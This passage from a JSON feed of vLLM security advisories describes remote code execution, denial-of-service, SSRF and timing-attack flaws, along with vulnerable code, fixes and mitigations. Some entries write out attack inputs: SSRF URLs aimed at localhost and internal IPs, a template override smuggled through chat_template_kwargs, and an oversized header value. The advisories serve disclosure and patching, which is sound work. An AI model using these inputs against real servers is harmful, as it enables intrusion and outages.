https://github.com/vllm-project/vllm/pull/30649","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-01-08T21:47:43.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.8,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-mcmc-2m55-j8jj","https://github.com/vllm-project/vllm/pull/30649","https://access.redhat.com/security/cve/CVE-2026-56340","https://bugzilla.redhat.com/show_bug.cgi?id=2491060","https://github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2026-250.yaml","https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-56340.json","https://www.vulncheck.com/advisories/vllm-denial-of-service-via-unvalidated-multimodal-embeddings","https://github.com/advisories/GHSA-mcmc-2m55-j8jj"],"source_kind":"github","identifiers":["GHSA-mcmc-2m55-j8jj","CVE-2026-56340"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-01-08T22:00:07.406Z","updated_at":"2026-09-23T10:00:20.971Z","epss_percentage":0.00644,"epss_percentile":0.48576,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tY21jLTJtNTUtajhqas4ABQ31","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1tY21jLTJtNTUtajhqas4ABQ31","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.13.0","vulnerable_version_range":"\u003e= 0.10.2, \u003c 0.13.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tY21jLTJtNTUtajhqas4ABQ31/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS04ZnI0LTVxOWotbThnbc4ABPHk","url":"https://github.com/advisories/GHSA-8fr4-5q9j-m8gm","title":"vLLM vulnerable to remote code execution via transformers_utils/get_config","description":"### Summary\n\n`vllm` has a critical remote code execution vector in a config class named `Nemotron_Nano_VL_Config`. When `vllm` loads a model config that contains an `auto_map` entry, the config class resolves that mapping with `get_class_from_dynamic_module(...)` and immediately instantiates the returned class. This fetches and executes Python from the remote repository referenced in the `auto_map` string. Crucially, this happens even when the caller explicitly sets `trust_remote_code=False` in `vllm.transformers_utils.config.get_config`. In practice, an attacker can publish a benign-looking frontend repo whose `config.json` points via `auto_map` to a separate malicious backend repo; loading the frontend will silently run the backend’s code on the victim host.\n\n### Details\n\nThe vulnerable code resolves and instantiates classes from `auto_map` entries without checking whether those entries point to a different repo or whether remote code execution is allowed.\n\n```python\nclass Nemotron_Nano_VL_Config(PretrainedConfig):\n    model_type = 'Llama_Nemotron_Nano_VL'\n\n    def __init__(self, **kwargs):\n        super().__init__(**kwargs)\n\n        if vision_config is not None:\n            assert \"auto_map\" in vision_config and \"AutoConfig\" in vision_config[\"auto_map\"]\n            # \u003c-- vulnerable dynamic resolution + instantiation happens here\n            vision_auto_config = get_class_from_dynamic_module(*vision_config[\"auto_map\"][\"AutoConfig\"].split(\"--\")[::-1])\n            self.vision_config = vision_auto_config(**vision_config)\n        else:\n            self.vision_config = PretrainedConfig()\n```\n\n`get_class_from_dynamic_module(...)` is capable of fetching and importing code from the Hugging Face repo specified in the mapping. `trust_remote_code` is not enforced for this code path. As a result, a frontend repo can redirect the loader to any backend repo and cause code execution, bypassing the `trust_remote_code` guard.\n\n### Impact\n\nThis is a critical vulnerability because it breaks the documented `trust_remote_code` safety boundary in a core model-loading utility. The vulnerable code lives in a common loading path, so any application, service, CI job, or developer machine that uses `vllm`’s transformer utilities to load configs can be affected. The attack requires only two repos and no user interaction beyond loading the frontend model. A successful exploit can execute arbitrary commands on the host.\n\n### Fixes\n\n* https://github.com/vllm-project/vllm/pull/28126","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2025-12-02T17:34:16.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.1,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-8fr4-5q9j-m8gm","https://nvd.nist.gov/vuln/detail/CVE-2025-66448","https://github.com/vllm-project/vllm/pull/28126","https://github.com/vllm-project/vllm/commit/ffb08379d8870a1a81ba82b72797f196838d0c86","https://github.com/advisories/GHSA-8fr4-5q9j-m8gm","https://github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2026-2015.yaml","https://github.com/vllm-project/vllm","https://pypi.org/project/vllm"],"source_kind":"github","identifiers":["GHSA-8fr4-5q9j-m8gm","CVE-2025-66448"],"repository_url":null,"blast_radius":0.0,"created_at":"2025-12-02T18:00:07.585Z","updated_at":"2026-09-28T20:06:11.790Z","epss_percentage":0.0066,"epss_percentile":0.49554,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04ZnI0LTVxOWotbThnbc4ABPHk","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS04ZnI0LTVxOWotbThnbc4ABPHk","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.11.1","vulnerable_version_range":"\u003c 0.11.1"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04ZnI0LTVxOWotbThnbc4ABPHk/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS02OWo0LWdyeGotajY0cM4ABOtt","url":"https://github.com/advisories/GHSA-69j4-grxj-j64p","title":"vLLM vulnerable to DoS via large Chat Completion or Tokenization requests with specially crafted `chat_template_kwargs`","description":"### Summary\nThe /v1/chat/completions and /tokenize endpoints allow a `chat_template_kwargs` request parameter that is used in the code before it is properly validated against the chat template. With the right `chat_template_kwargs` parameters, it is possible to block processing of the API server for long periods of time, delaying all other requests \n\n### Details\nIn serving_engine.py, the chat_template_kwargs are unpacked into kwargs passed to chat_utils.py `apply_hf_chat_template` with no validation on the keys or values in that chat_template_kwargs dict. This means they can be used to override optional parameters in the `apply_hf_chat_template` method, such as `tokenize`, changing its default from False to True.\n\nhttps://github.com/vllm-project/vllm/blob/2a6dc67eb520ddb9c4138d8b35ed6fe6226997fb/vllm/entrypoints/openai/serving_engine.py#L809-L814\n\nhttps://github.com/vllm-project/vllm/blob/2a6dc67eb520ddb9c4138d8b35ed6fe6226997fb/vllm/entrypoints/chat_utils.py#L1602-L1610\n\nBoth serving_chat.py and serving_tokenization.py call into this `_preprocess_chat` method of `serving_engine.py` and they both pass in `chat_template_kwargs`.\n\nSo, a `chat_template_kwargs` like `{\"tokenize\": True}` makes tokenization happen as part of applying the chat template, even though that is not expected. Tokenization is a blocking operation, and with sufficiently large input can block the API server's event loop, which blocks handling of all other requests until this tokenization is complete.\n\nThis optional `tokenize` parameter to `apply_hf_chat_template` does not appear to be used, so one option would be to just hard-code that to always be False instead of allowing it to be optionally overridden by callers. A better option may be to not pass `chat_template_kwargs` as unpacked kwargs but instead as a dict, and only unpack them after the logic in `apply_hf_chat_template` that resolves the kwargs against the chat template.\n\n### Impact\n\nAny authenticated user can cause a denial of service to a vLLM server with Chat Completion or Tokenize requests.\n\n### Fix\n\nhttps://github.com/vllm-project/vllm/pull/27205","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-11-20T21:26:24.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-69j4-grxj-j64p","https://github.com/vllm-project/vllm/pull/27205","https://github.com/vllm-project/vllm/commit/3ada34f9cb4d1af763fdfa3b481862a93eb6bd2b","https://github.com/vllm-project/vllm/blob/2a6dc67eb520ddb9c4138d8b35ed6fe6226997fb/vllm/entrypoints/chat_utils.py#L1602-L1610","https://github.com/vllm-project/vllm/blob/2a6dc67eb520ddb9c4138d8b35ed6fe6226997fb/vllm/entrypoints/openai/serving_engine.py#L809-L814","https://nvd.nist.gov/vuln/detail/CVE-2025-62426","https://github.com/advisories/GHSA-69j4-grxj-j64p","https://github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2026-2012.yaml","https://github.com/vllm-project/vllm","https://pypi.org/project/vllm"],"source_kind":"github","identifiers":["GHSA-69j4-grxj-j64p","CVE-2025-62426"],"repository_url":null,"blast_radius":0.0,"created_at":"2025-11-20T22:00:08.327Z","updated_at":"2026-09-25T12:06:49.058Z","epss_percentage":0.00368,"epss_percentile":0.27871,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02OWo0LWdyeGotajY0cM4ABOtt","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS02OWo0LWdyeGotajY0cM4ABOtt","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.11.1","vulnerable_version_range":"\u003e= 0.5.5, \u003c 0.11.1"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02OWo0LWdyeGotajY0cM4ABOtt/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1wbXFmLXg2eDgtcDdxd84ABOts","url":"https://github.com/advisories/GHSA-pmqf-x6x8-p7qw","title":"vLLM vulnerable to DoS with incorrect shape of multimodal embedding inputs","description":"### Summary\n\nUsers can crash the vLLM engine serving multimodal models by passing multimodal embedding inputs with correct `ndim` but incorrect `shape` (e.g. hidden dimension is wrong), regardless of whether the model is intended to support such inputs (as defined in the Supported Models page).\n\nThe issue has existed ever since we added support for image embedding inputs, i.e. #6613 (released in v0.5.5)\n\n### Details\n\nUsing image embeddings as an example:\n\n- For models that support image embedding inputs, the engine crashes when scattering the embeddings to `inputs_embeds` (mismatched shape)\n- For models that don't support image embedding inputs, the engine crashes when validating the inputs inside `get_input_embeddings` (validation fails).\n\nThis happens because we only validate `ndim` of the tensor, but not the full shape, in input processor (via `MultiModalDataParser`).\n\n### Impact\n\n- Denial of service by crashing the engine\n\n### Mitigation\n\n- Use API key to limit access to trusted users.\n- Set `--limit-mm-per-prompt` to 0 for all non-text modalities to ban multimodal inputs, which includes multimodal embedding inputs. However, the model would then only accept text, defeating the purpose of using a multi-modal model.\n\n### Resolution\n\n- https://github.com/vllm-project/vllm/pull/27204","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2025-11-20T21:23:29.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.3,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-pmqf-x6x8-p7qw","https://github.com/vllm-project/vllm/pull/27204","https://github.com/vllm-project/vllm/pull/6613","https://github.com/vllm-project/vllm/commit/58fab50d82838d5014f4a14d991fdb9352c9c84b","https://nvd.nist.gov/vuln/detail/CVE-2025-62372","https://github.com/advisories/GHSA-pmqf-x6x8-p7qw","https://github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2026-2019.yaml","https://github.com/vllm-project/vllm","https://pypi.org/project/vllm"],"source_kind":"github","identifiers":["GHSA-pmqf-x6x8-p7qw","CVE-2025-62372"],"repository_url":null,"blast_radius":0.0,"created_at":"2025-11-20T22:00:08.327Z","updated_at":"2026-09-28T20:06:17.148Z","epss_percentage":0.00382,"epss_percentile":0.29592,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1wbXFmLXg2eDgtcDdxd84ABOts","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1wbXFmLXg2eDgtcDdxd84ABOts","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.11.1","vulnerable_version_range":"\u003e= 0.5.5, \u003c 0.11.1"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1wbXFmLXg2eDgtcDdxd84ABOts/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1tcnc3LWhmNGYtODNwZs4ABOtr","url":"https://github.com/advisories/GHSA-mrw7-hf4f-83pf","title":"vLLM deserialization vulnerability leading to DoS and potential RCE","description":"### Summary\nA memory corruption vulnerability that leading to a crash (denial-of-service) and potentially remote code execution (RCE) exists in vLLM versions 0.10.2 and later, in the Completions API endpoint. When processing user-supplied prompt embeddings, the endpoint loads serialized tensors using torch.load() without sufficient validation.\n\nDue to a change introduced in PyTorch 2.8.0, sparse tensor integrity checks are disabled by default. As a result, maliciously crafted tensors can bypass internal bounds checks and trigger an out-of-bounds memory write during the call to to_dense(). This memory corruption can crash vLLM and potentially lead to code execution on the server hosting vLLM.\n\n### Details\nA vulnerability that can lead to RCE from the completions API endpoint exists in vllm, where due to missing checks when loading user-provided tensors, an out-of-bounds write can be triggered. This happens because the default behavior of `torch.load(tensor, weights_only=True)`  since pytorch 2.8.0 is to not perform validity checks for sparse tensors, and this needs to be enabled explicitly using the [torch.sparse.check_sparse_tensor_invariants](https://docs.pytorch.org/docs/stable/generated/torch.sparse.check_sparse_tensor_invariants.html) context manager.\n\nThe vulnerability is in the following code in [vllm/entrypoints/renderer.py:148](https://github.com/vllm-project/vllm/blob/a332b84578cdc0706e040f6a765954c8a289904f/vllm/entrypoints/renderer.py#L148)\n\n```python\n    def _load_and_validate_embed(embed: bytes) -\u003e EngineEmbedsPrompt:\n        tensor = torch.load(\n            io.BytesIO(pybase64.b64decode(embed, validate=True)),\n            weights_only=True,\n            map_location=torch.device(\"cpu\"),\n        )\n        assert isinstance(tensor, torch.Tensor) and tensor.dtype in (\n            torch.float32,\n            torch.bfloat16,\n            torch.float16,\n        )\n        tensor = tensor.to_dense()\n```\n\nBecause of the missing checks, loading invalid prompt embedding tensors provided by the user can cause an out-of-bounds write in the call to `to_dense` .\n\n### Impact\nAll users with access to this API are able to exploit this vulnerability. Unsafe deserialization of untrusted input can be abused to achieve DoS and potentially remote code execution (RCE) in the vLLM server process. This impacts deployments running vLLM as a server or any instance that deserializes untrusted/model-provided payloads.\n\n## Fix\n\nhttps://github.com/vllm-project/vllm/pull/27204\n\n## Acknowledgements\n\nFinder: AXION Security Research Team (Omri Fainaro, Bary Levy): discovery and coordinated disclosure.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2025-11-20T20:59:34.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.8,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-mrw7-hf4f-83pf","https://github.com/vllm-project/vllm/pull/27204","https://github.com/vllm-project/vllm/commit/58fab50d82838d5014f4a14d991fdb9352c9c84b","https://nvd.nist.gov/vuln/detail/CVE-2025-62164","https://github.com/advisories/GHSA-mrw7-hf4f-83pf","https://github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2026-2018.yaml","https://github.com/vllm-project/vllm","https://pypi.org/project/vllm"],"source_kind":"github","identifiers":["GHSA-mrw7-hf4f-83pf","CVE-2025-62164"],"repository_url":null,"blast_radius":0.0,"created_at":"2025-11-20T21:00:08.984Z","updated_at":"2026-09-25T12:06:49.061Z","epss_percentage":0.00929,"epss_percentile":0.58865,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tcnc3LWhmNGYtODNwZs4ABOtr","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1tcnc3LWhmNGYtODNwZs4ABOtr","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.11.1","vulnerable_version_range":"\u003e= 0.10.2, \u003c 0.11.1"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tcnc3LWhmNGYtODNwZs4ABOtr/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0zZjZjLTdmdzItcHBtNM4ABNF-","url":"https://github.com/advisories/GHSA-3f6c-7fw2-ppm4","title":"vLLM is vulnerable to Server-Side Request Forgery (SSRF) through `MediaConnector` class","description":"### Summary\n\nA Server-Side Request Forgery (SSRF) vulnerability exists in the `MediaConnector` class within the vLLM project's multimodal feature set. The `load_from_url` and `load_from_url_async` methods fetch and process media from user-provided URLs without adequate restrictions on the target hosts. This allows an attacker to coerce the vLLM server into making arbitrary requests to internal network resources.\n\nThis vulnerability is particularly critical in containerized environments like `llm-d`, where a compromised vLLM pod could be used to scan the internal network, interact with other pods, and potentially cause denial of service or access sensitive data. For example, an attacker could make the vLLM pod send malicious requests to an internal `llm-d` management endpoint, leading to system instability by falsely reporting metrics like the KV cache state.\n\n### Vulnerability Details\n\nThe core of the vulnerability lies in the `MediaConnector.load_from_url` method and its asynchronous counterpart. These methods accept a URL string to fetch media content (images, audio, video).\n\nhttps://github.com/vllm-project/vllm/blob/119f683949dfed10df769fe63b2676d7f1eb644e/vllm/multimodal/utils.py#L97-L113\n\nThe function directly processes URLs with `http`, `https`, and `file` schemes. An attacker can supply a URL pointing to an internal IP address or a `localhost` endpoint. The vLLM server will then initiate a connection to this internal resource.\n\n* **HTTP/HTTPS Scheme:** An attacker can craft a request like `{\"image_url\": \"http://127.0.0.1:8080/internal_api\"}`. The vLLM server will send a GET request to this internal endpoint.\n* **File Scheme:** The `_load_file_url` method attempts to restrict file access to a subdirectory defined by `--allowed-local-media-path`. While this is a good security measure for local file access, it does not prevent network-based SSRF attacks.\n\n### Impact in `llm-d` Environments\n\nThe risk is significantly amplified in orchestrated environments such as `llm-d`, where multiple pods communicate over an internal network.\n\n1.  **Denial of Service (DoS):** An attacker could target internal management endpoints of other services within the `llm-d` cluster. For instance, if a monitoring or metrics service is exposed internally, an attacker could send malformed requests to it. A specific example is an attacker causing the vLLM pod to call an internal API that reports a false KV cache utilization, potentially triggering incorrect scaling decisions or even a system shutdown.\n\n2.  **Internal Network Reconnaissance:** Attackers can use the vulnerability to scan the internal network for open ports and services by providing URLs like `http://10.0.0.X:PORT` and observing the server's response time or error messages.\n\n3.  **Interaction with Internal Services:** Any unsecured internal service becomes a potential target. This could include databases, internal APIs, or other model pods that might not have robust authentication, as they are not expected to be directly exposed.\n\nDelegating this security responsibility to an upper-level orchestrator like `llm-d` is problematic. **The orchestrator cannot easily distinguish between legitimate requests initiated by the vLLM engine for its own purposes and malicious requests originating from user input, thus complicating traffic filtering rules and increasing management overhead.**\n\n### Fix\n\nSee the `--allowed-media-domains` option discussed here: https://docs.vllm.ai/en/latest/usage/security.html#4-restrict-domains-access-for-media-urls","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2025-10-07T22:14:15.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.1,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:H","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-3f6c-7fw2-ppm4","https://nvd.nist.gov/vuln/detail/CVE-2025-6242","https://github.com/vllm-project/vllm/commit/9d9a2b77f19f68262d5e469c4e82c0f6365ad72d","https://access.redhat.com/security/cve/CVE-2025-6242","https://bugzilla.redhat.com/show_bug.cgi?id=2373716","https://github.com/advisories/GHSA-3f6c-7fw2-ppm4"],"source_kind":"github","identifiers":["GHSA-3f6c-7fw2-ppm4","CVE-2025-6242"],"repository_url":"https://github.com/vllm-project/vllm","blast_radius":0.0,"created_at":"2025-10-07T23:00:07.784Z","updated_at":"2026-10-03T14:05:43.060Z","epss_percentage":0.00247,"epss_percentile":0.14541,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zZjZjLTdmdzItcHBtNM4ABNF-","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0zZjZjLTdmdzItcHBtNM4ABNF-","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.11.0","vulnerable_version_range":"\u003e= 0.5.0, \u003c 0.11.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zZjZjLTdmdzItcHBtNM4ABNF-/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS02ZnZxLTIzY3ctNTYyOM4ABNF8","url":"https://github.com/advisories/GHSA-6fvq-23cw-5628","title":"vLLM: Resource-Exhaustion (DoS) through Malicious Jinja Template in OpenAI-Compatible Server","description":"### Summary\n\nA resource-exhaustion (denial-of-service) vulnerability exists in multiple endpoints of the OpenAI-Compatible Server due to the ability to specify Jinja templates via the `chat_template` and `chat_template_kwargs` parameters. If an attacker can supply these parameters to the API, they can cause a service outage by exhausting CPU and/or memory resources.\n\n### Details\n\nWhen using an LLM as a chat model, the conversation history must be rendered into a text input for the model. In `hf/transformer`, this rendering is performed using a Jinja template. The OpenAI-Compatible Server launched by vllm serve exposes a `chat_template` parameter that lets users specify that template. In addition, the server accepts a `chat_template_kwargs` parameter to pass extra keyword arguments to the rendering function.\n\nBecause Jinja templates support programming-language-like constructs (loops, nested iterations, etc.), a crafted template can consume extremely large amounts of CPU and memory and thereby trigger a denial-of-service condition.\n\nImportantly, simply forbidding the `chat_template` parameter does not fully mitigate the issue. The implementation constructs a dictionary of keyword arguments for `apply_hf_chat_template` and then updates that dictionary with the user-supplied `chat_template_kwargs` via `dict.update`. Since `dict.update` can overwrite existing keys, an attacker can place a `chat_template` key inside `chat_template_kwargs` to replace the template that will be used by `apply_hf_chat_template`.\n\n\n```python\n# vllm/entrypoints/openai/serving_engine.py#L794-L816\n_chat_template_kwargs: dict[str, Any] = dict(\n    chat_template=chat_template,\n    add_generation_prompt=add_generation_prompt,\n    continue_final_message=continue_final_message,\n    tools=tool_dicts,\n    documents=documents,\n)\n_chat_template_kwargs.update(chat_template_kwargs or {})\n\nrequest_prompt: Union[str, list[int]]\nif isinstance(tokenizer, MistralTokenizer):\n    ...\nelse:\n    request_prompt = apply_hf_chat_template(\n        tokenizer=tokenizer,\n        conversation=conversation,\n        model_config=model_config,\n        **_chat_template_kwargs,\n    )\n```\n\n### Impact\n\nIf an OpenAI-Compatible Server exposes endpoints that accept `chat_template` or `chat_template_kwargs` from untrusted clients, an attacker can submit a malicious Jinja template (directly or by overriding `chat_template` inside `chat_template_kwargs`) that consumes excessive CPU and/or memory. This can result in a resource-exhaustion denial-of-service that renders the server unresponsive to legitimate requests.\n\n### Fixes\n\n* https://github.com/vllm-project/vllm/pull/25794","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-10-07T21:35:22.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-6fvq-23cw-5628","https://github.com/vllm-project/vllm/pull/25794","https://github.com/vllm-project/vllm/commit/7977e5027c2250a4abc1f474c5619c40b4e5682f","https://github.com/advisories/GHSA-6fvq-23cw-5628"],"source_kind":"github","identifiers":["GHSA-6fvq-23cw-5628","CVE-2025-61620"],"repository_url":"https://github.com/vllm-project/vllm","blast_radius":0.0,"created_at":"2025-10-07T22:00:06.880Z","updated_at":"2026-09-23T15:07:36.653Z","epss_percentage":0.00207,"epss_percentile":0.43228,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02ZnZxLTIzY3ctNTYyOM4ABNF8","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS02ZnZxLTIzY3ctNTYyOM4ABNF8","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.11.0","vulnerable_version_range":"\u003e= 0.5.1, \u003c 0.11.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02ZnZxLTIzY3ctNTYyOM4ABNF8/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS13cjloLWc3MngtbXdobc4ABNDR","url":"https://github.com/advisories/GHSA-wr9h-g72x-mwhm","title":"vLLM is vulnerable to timing attack at bearer auth","description":"### Summary\nThe API key support in vLLM performed validation using a method that was vulnerable to a timing attack. This could potentially allow an attacker to discover a valid API key using an approach more efficient than brute force.\n\n### Details\nhttps://github.com/vllm-project/vllm/blob/4b946d693e0af15740e9ca9c0e059d5f333b1083/vllm/entrypoints/openai/api_server.py#L1270-L1274\n\nAPI key validation used a string comparison that will take longer the more characters the provided API key gets correct. Data analysis across many attempts can allow an attacker to determine when it finds the next correct character in the key sequence.\n \n### Impact\nDeployments relying on vLLM's built-in API key validation are vulnerable to authentication bypass using this technique.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2025-10-07T17:24:47.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-wr9h-g72x-mwhm","https://nvd.nist.gov/vuln/detail/CVE-2025-59425","https://github.com/vllm-project/vllm/commit/ee10d7e6ff5875386c7f136ce8b5f525c8fcef48","https://github.com/vllm-project/vllm/blob/4b946d693e0af15740e9ca9c0e059d5f333b1083/vllm/entrypoints/openai/api_server.py#L1270-L1274","https://github.com/vllm-project/vllm/releases/tag/v0.11.0","https://github.com/advisories/GHSA-wr9h-g72x-mwhm","https://github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2026-2026.yaml","https://github.com/vllm-project/vllm","https://pypi.org/project/vllm"],"source_kind":"github","identifiers":["GHSA-wr9h-g72x-mwhm","CVE-2025-59425"],"repository_url":"https://github.com/vllm-project/vllm","blast_radius":0.0,"created_at":"2025-10-07T18:00:12.263Z","updated_at":"2026-09-25T12:07:11.278Z","epss_percentage":0.00566,"epss_percentile":0.44557,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS13cjloLWc3MngtbXdobc4ABNDR","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS13cjloLWc3MngtbXdobc4ABNDR","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.11.0","vulnerable_version_range":"\u003c 0.11.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS13cjloLWc3MngtbXdobc4ABNDR/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS03OWo2LWcybTMtamdmd84ABLTx","url":"https://github.com/advisories/GHSA-79j6-g2m3-jgfw","title":"vLLM has remote code execution vulnerability in the tool call parser for Qwen3-Coder","description":"### Summary\nAn unsafe deserialization vulnerability allows any authenticated user to execute arbitrary code on the server if they are able to get the model to pass the code as an argument to a tool call.\n\n### Details\n vLLM's [Qwen3 Coder tool parser](https://github.com/vllm-project/vllm/blob/main/vllm/entrypoints/openai/tool_parsers/qwen3coder_tool_parser.py) contains a code execution path that uses Python's `eval()` function to parse tool call parameters. This occurs during the parameter conversion process when the parser attempts to handle unknown data types.\n\nThis code path is reached when:\n1. Tool calling is enabled (`--enable-auto-tool-choice`)\n2. The qwen3_coder parser is specified (`--tool-call-parser qwen3_coder`)\n3. The parameter type is not explicitly defined or recognized\n\n### Impact\nRemote Code Execution via Python's `eval()` function.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2025-08-21T14:46:51.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.8,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-79j6-g2m3-jgfw","https://github.com/vllm-project/vllm/pull/21396","https://github.com/vllm-project/vllm/commit/4594fc3b281713bd3d7634405b4a1393af40d294","https://github.com/advisories/GHSA-79j6-g2m3-jgfw"],"source_kind":"github","identifiers":["GHSA-79j6-g2m3-jgfw","CVE-2025-9141"],"repository_url":"https://github.com/vllm-project/vllm","blast_radius":0.0,"created_at":"2025-08-21T15:11:20.971Z","updated_at":"2026-09-23T15:08:14.511Z","epss_percentage":0.04016,"epss_percentile":0.88754,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03OWo2LWcybTMtamdmd84ABLTx","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS03OWo2LWcybTMtamdmd84ABLTx","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.10.1.1","vulnerable_version_range":"\u003e= 0.10.0, \u003c 0.10.1.1"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03OWo2LWcybTMtamdmd84ABLTx/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1yeGM0LTN3NnItNHY0N84ABLTs","url":"https://github.com/advisories/GHSA-rxc4-3w6r-4v47","title":"vllm API endpoints vulnerable to Denial of Service Attacks","description":"### Summary\nA Denial of Service (DoS) vulnerability can be triggered by sending a single HTTP GET request with an extremely large header to an HTTP endpoint. This results in server memory exhaustion, potentially leading to a crash or unresponsiveness. The attack does not require authentication, making it exploitable by any remote user.\n\n### Details\nThe vulnerability leverages the abuse of HTTP headers. By setting a header such as `X-Forwarded-For` to a very large value like `(\"A\" * 5_800_000_000)`, the server's HTTP parser or application logic may attempt to load the entire request into memory, overwhelming system 